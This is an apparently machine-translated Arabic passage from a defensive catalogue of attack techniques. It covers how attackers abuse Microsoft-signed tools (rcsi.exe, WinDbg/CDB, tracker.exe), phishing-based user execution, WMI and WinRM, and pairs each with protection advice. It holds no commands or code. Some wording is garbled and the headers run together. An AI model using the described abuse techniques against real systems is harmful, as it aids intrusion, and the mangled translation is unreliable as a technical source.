أوامر غير تفاعلية لـ C # ، على غرار csi.exe. تم تقديمه في إصدار سابق من منصة مترجم Roslyn .Net. تم توقيع Rcsi.exe بواسطة Microsoft Digital Certificate. يمكن كتابة ملفات البرامج النصية C # .csx وتنفيذها باستخدام Rcsi.exe في موجه أوامر Windows.WinDbg / CDB هو نواة MS Windows وأداة مساعدة لتصحيح الأخطاء في وضع المستخدم. إن المصحح وحدة تحكم Microsoft cdb.exe هو أيضًا مصحح أخطاء في وضع المستخدم. يمكن استخدام كلا الأداتين كأدوات قائمة بذاتها. شائع الاستخدام في تطوير البرامج والهندسة العكسية ولا يمكن العثور عليه في أنظمة Windows العادية. تم توقيع ملفات WinDbg.exe و CDB.exe بواسطة شهادة Microsoft الرقمية ويمكن استخدامها لتعليمات برمجية الوكيل.متعقب- أداة تتبع ملف tracker.exe. مضمن في .NET كجزء من MSBuild. يُستخدم لتسجيل المكالمات في نظام ملفات Windows 10. يمكن للمهاجمين استخدام tracker.exe لتنفيذ DLL في عمليات مختلفة. تم توقيع Tracker.exe أيضًا بشهادة Microsoft.توصيات الحماية: يجب حذف جميع الملفات المذكورة أعلاه من النظام إذا لم يتم استخدامها للغرض المقصود من قبل المستخدمين.النظام: Windows ، Linux ،حقوق macOS :وصف المستخدم : يمكن للمهاجمين الاعتماد على إجراءات معينة للمستخدم من أجل تنفيذ إجراءات معينة. يمكن أن يكون تنفيذ التعليمات البرمجية المباشرة عندما يفتح المستخدم ملفًا ضارًا قابل للتنفيذ يتم تسليمه كمرفق تصيد مع رمز وملحق ملف مستند مرئي. في بعض الأحيان ، يمكن استخدام تقنيات أخرى ، على سبيل المثال ، عندما ينقر المستخدم على رابط في بريد إلكتروني للتصيد الاحتيالي ، مما يؤدي إلى استغلال ثغرة المتصفح. غالبًا ما تُستخدم تقنية "تنفيذ المستخدم" في مراحل أخرى من الغزو ، على سبيل المثال ، عندما يضع مهاجم ملفًا في دليل مشترك أو على سطح مكتب المستخدم ، على أمل أن "ينقر عليه".نصائح للحماية: رفع وعي المستخدم. حظر تنزيل ملفات مثل .scr و .exe و .pif و .cpl ، إلخ. استخدام برامج مكافحة الفيروسات وتنفيذ أنظمة IPS.النظام: حقوق Windows : المستخدم ، المسؤولالوصف: WMI هي أداة لإدارة Windows ، والتي توفر الوصول المحلي والبعيد إلى مكونات نظام Windows. يستخدم WMI SMB و RPCS (يعمل على المنفذ 135). يمكن للمهاجمين استخدام WMI للتفاعل مع الأنظمة المحلية والبعيدة ، وأيضًا كوسيلة لإجراء العديد من العمليات التكتيكية ، مثل جمع المعلومات في مرحلة مراجعة الموارد (الاكتشاف) وتنفيذ الملفات عن بعد أثناء "الحركة الحرفية".توصيات الحماية:يمكن أن يؤدي تعطيل WMI و RPCS إلى عدم استقرار النظام. بشكل افتراضي ، يمكن للمسؤولين فقط الاتصال بالنظام عن بعد عبر WMI. منع ازدواجية الامتيازات بين الحسابات الإدارية والحسابات الأخرى ذات الامتيازات.النظام: حقوق Windows : المستخدم ، المسؤولالوصف: Windows Remote Management (WinRM) هو اسم الخدمة والبروتوكول الذي يسمح بتفاعل المستخدم عن بعد مع النظام (على سبيل المثال ، تشغيل ملف ، وتغيير التسجيل ، وتغيير الخدمة. للبدء ، استخدم الأمر winrm والبرامج الأخرى .، مثل بوويرشيلالمشورة بشأن الحماية: تعطيل خدمة WinRM وإذا كان ذلك ضروريا، WinRM والبنية التحتية عزل مع حسابات منفصلة وإذن ينبغي أن يكون .. توصيات WinRM و حول إعداد طرائق التوثيق واستخدام randmauerov المضيفة للسماح بالوصول إلى WinRM وفقط مع أجهزة معينة.